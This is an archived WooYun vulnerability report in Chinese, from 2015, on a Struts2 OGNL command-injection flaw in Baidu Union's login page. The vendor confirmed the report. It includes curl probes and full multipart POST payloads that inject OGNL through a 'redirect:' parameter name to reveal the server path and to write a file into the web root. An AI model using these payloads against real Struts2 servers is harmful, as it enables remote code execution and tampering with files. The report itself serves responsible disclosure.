乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-17: 细节已通知厂商并且等待厂商处理中 2015-10-17: 厂商已经确认,细节仅向厂商公开 2015-10-27: 细节向核心白帽子及相关领域专家公开 2015-11-06: 细节向普通白帽子公开 2015-11-16: 细节向实习白帽子公开 2015-12-01: 细节向公众公开
baidu惊现st2命令执行。。。
百度联盟 http://union.baidu.com/userlogin.action
http://union.baidu.com/userlogin.action?redirect:/xxoo
返回空白
curl http://union.baidu.com/userlogin.action -d "redirect:/xxoo=1"
curl -i http://union.baidu.com/userlogin.action -F "redirect:/xxoo=-1"HTTP/1.1 302 FoundConnection: Keep-AliveContent-Length: 0Date: Fri, 16 Oct 2015 14:53:13 GMTLocation: http://union.baidu.com/xxoo;jsessionid=6A2E51000AE93C7F2126AC067338B598.worker1Server: Apache-Coyote/1.1Set-Cookie: JSESSIONID=6A2E51000AE93C7F2126AC067338B598.worker1; Path=/X-Prism-Spanid: 0X-Prism-Uid: 20151016_93E12A56-F41F-4228-934B-C310562131A2Content-Type: text/plain; charset=utf-8
302跳转了。。。multipart表单没有检测?发现完全不用考虑参数名中的双引号,有点像正则的贪婪匹配模式,这是java web容器的特性?
获取web项目路径:
POST http://union.baidu.com/userlogin.action HTTP/1.1User-Agent: curl/7.33.0Host: union.baidu.comAccept: */*Proxy-Connection: Keep-AliveContent-Length: 236Content-Type: multipart/form-data; boundary=------------------------4a606c052a893987--------------------------4a606c052a893987Content-Disposition: form-data; name="redirect:/${#context.get("com.opensymphony.xwork2.dispatcher.HttpServletRequest").getRealPath("/")}"-1--------------------------4a606c052a893987--
写shell测试:
POST http://union.baidu.com/userlogin.action HTTP/1.1User-Agent: curl/7.33.0Host: union.baidu.comAccept: */*Proxy-Connection: Keep-AliveContent-Length: 232Content-Type: multipart/form-data; boundary=------------------------4a606c052a893987--------------------------4a606c052a893987Content-Disposition: form-data; name="redirect:/${"x"+(new java.io.PrintWriter("/home/work/union/htdocs/wooyun.jpg")).append("wooyun").close()}"1--------------------------4a606c052a893987--
http://union.baidu.com/wooyun.jpg
...
危害等级:高
漏洞Rank:10
确认时间:2015-10-17 01:04
感谢提交,已通知修复。
暂无